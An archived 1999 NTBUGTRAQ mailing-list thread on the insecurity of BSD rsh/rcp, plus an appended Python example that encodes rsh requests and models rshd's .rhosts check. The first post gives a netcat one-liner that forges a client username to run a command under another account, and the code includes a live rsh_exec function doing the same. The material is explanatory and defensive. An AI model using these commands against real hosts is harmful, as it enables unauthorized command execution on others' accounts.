Date: Thu, 8 Apr 1999 19:11:54 -0700
From: Eric Gisin
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: rsh/rcp is not secure

This is really a UNIX rshd bug, but it affects users of the NT clients.

It's old news that the BSD rsh/rcp services are not secure; however, rshd is still enabled in many UNIX systems. There are rsh/rcp clients in Windows NT, and people are not aware of the ease of defeating security in this environment.

The security of this service is based on privileged ports, which are not widely implemented. The NT versions of rcp/rsh have no special privileges like the UNIX versions. Anyone can modify the source or use netcat to fake the client username. For example,

    D:> nc -v unixhost 514 -p 666
    ^@newbie^@newbie^@chmod a= .^@

This will execute the chmod command under newbie's account, if he permits access from that client machine in .rhosts.

Basically the problem is that since Windows NT includes rsh/rcp, people assume it's as secure as the UNIX counterpart, which is not the case.

--------------------------------------------------------------------------

Date: Fri, 9 Apr 1999 09:28:04 -0700
From: David LeBlanc
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: rsh/rcp is not secure

At 07:11 PM 4/8/99 -0700, Eric Gisin wrote:
>Basically the problem is that since Windows NT includes rsh/rcp, people assume
>it's as secure as the UNIX counterpart, which is not the case.

The UNIX counterpart isn't really all that secure in any case: it assumes that no one on the network can be root, and so come from a low port.

Something else to think about is that running a rshd on NT isn't usually a good idea. Several implementations run everything as LocalSystem, and the ones that don't store live user passwords. These utilities are full of other security holes; look at the checks in the various scanning products for some examples.

Safest thing is just not to run rsh, rlogin and rexec.

David LeBlanc
dleblanc@mindspring.com
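The exchange both posts describe, as an added example that is not part of the original thread: the four NUL-terminated fields rshd reads on port 514 (the bytes behind Eric Gisin's netcat line), the one-byte success/failure reply, and a simplified model of the reserved-port and ~/.rhosts check that decides whether the request runs. The hostnames `unixhost`/`ntclient`, the user `newbie` and the `RHOSTS` table are constructed for the illustration; `rshd_authorizes` is a sketch of the BSD ruserok() logic, not the real code. Only `rsh_exec` touches the network and it is never called by the demo.

```python
"""BSD rsh request/response encoding and a model of rshd's trust decision.
Added example for the NTBUGTRAQ thread above; not code from either poster."""
from __future__ import annotations

import socket

RSH_PORT = 514
# rshd only accepts connections whose source port lies in the reserved range
# (512..1023 in the BSD implementation), assuming only root can bind there.
# On Windows NT any user can bind port 666, so the check proves nothing.
RESERVED_LOW, RESERVED_HIGH = 512, 1023


def build_rsh_request(client_user: str, server_user: str, command: str,
                      stderr_port: int | None = None) -> bytes:
    """Encode what rshd reads after accept():
    <stderr port or empty>\\0<client user>\\0<server user>\\0<command>\\0
    The post's `^@newbie^@newbie^@chmod a= .^@` is exactly this encoding."""
    for field in (client_user, server_user, command):
        if "\x00" in field:
            raise ValueError("NUL terminates a field and cannot appear inside one")
    port_field = b"" if stderr_port is None else str(stderr_port).encode("ascii")
    return b"\x00".join([port_field, client_user.encode(), server_user.encode(),
                         command.encode()]) + b"\x00"


def parse_rsh_request(data: bytes) -> dict:
    """Server-side view: split a request back into its four fields."""
    parts = data.split(b"\x00")
    if len(parts) < 5:
        raise ValueError("truncated rsh request")
    port, client_user, server_user, command = parts[:4]
    return {
        "stderr_port": int(port) if port else None,
        "client_user": client_user.decode(),
        "server_user": server_user.decode(),
        "command": command.decode(),
    }


def parse_rsh_response(data: bytes) -> tuple[bool, str]:
    """rshd answers a single NUL byte on success; otherwise the first byte is
    non-zero and an error message such as "Permission denied." follows."""
    if not data:
        raise ValueError("empty rshd response")
    if data[0] == 0:
        return True, ""
    return False, data[1:].decode(errors="replace").rstrip("\r\n")


def rshd_authorizes(peer_host: str, peer_port: int, client_user: str,
                    server_user: str, rhosts: dict) -> tuple[bool, str]:
    """Simplified model of rshd's ~/.rhosts check (hypothetical, not ruserok()).
    `rhosts` maps each local user to the (host, remote user) pairs in that
    user's ~/.rhosts. Note what is never verified: the client username is
    whatever the client wrote into the request bytes."""
    if not RESERVED_LOW <= peer_port <= RESERVED_HIGH:
        return False, "Connection from non-reserved port"
    for host, user in rhosts.get(server_user, []):
        if host == peer_host and user == client_user:
            return True, f"{client_user}@{peer_host} allowed by ~{server_user}/.rhosts"
    return False, "Permission denied."


def rsh_exec(host: str, client_user: str, server_user: str, command: str,
             local_port: int = 666, timeout: float = 5.0) -> tuple[bool, str, bytes]:
    """Live equivalent of `nc host 514 -p 666` plus the four fields. Binding a
    port below 1024 needs root on UNIX but no privilege on NT.
    Returns (accepted, error message, command output)."""
    with socket.create_connection((host, RSH_PORT), timeout=timeout,
                                  source_address=("", local_port)) as sock:
        sock.sendall(build_rsh_request(client_user, server_user, command))
        status = sock.recv(1)
        if status != b"\x00":
            accepted, message = parse_rsh_response(status + sock.recv(1024))
            return accepted, message, b""
        output = b""
        while chunk := sock.recv(4096):
            output += chunk
        return True, "", output


# Constructed ~/.rhosts data for the post's scenario: newbie's ~/.rhosts on
# unixhost trusts newbie@ntclient. No real host or account is involved.
RHOSTS = {"newbie": [("ntclient", "newbie")]}


def demo() -> dict:
    """Replays the post's attack against the model: an NT user who is not
    newbie sends the request from port 666 with the client username forged."""
    request = build_rsh_request("newbie", "newbie", "chmod a= .")
    return {
        "request": request,
        "fields": parse_rsh_request(request),
        "forged_from_low_port": rshd_authorizes("ntclient", 666, "newbie", "newbie", RHOSTS),
        "forged_from_high_port": rshd_authorizes("ntclient", 40000, "newbie", "newbie", RHOSTS),
        "wrong_host": rshd_authorizes("otherhost", 666, "newbie", "newbie", RHOSTS),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The model makes the thread's point concrete: the only thing standing between a forged `client_user` and newbie's shell is the source-port test, and that test is a statement about who can bind low ports on the client, which holds for a multi-user UNIX box and not for an NT workstation. David LeBlanc's remark cuts the other way too: a root user on any UNIX host on the network can bind port 666 just as easily.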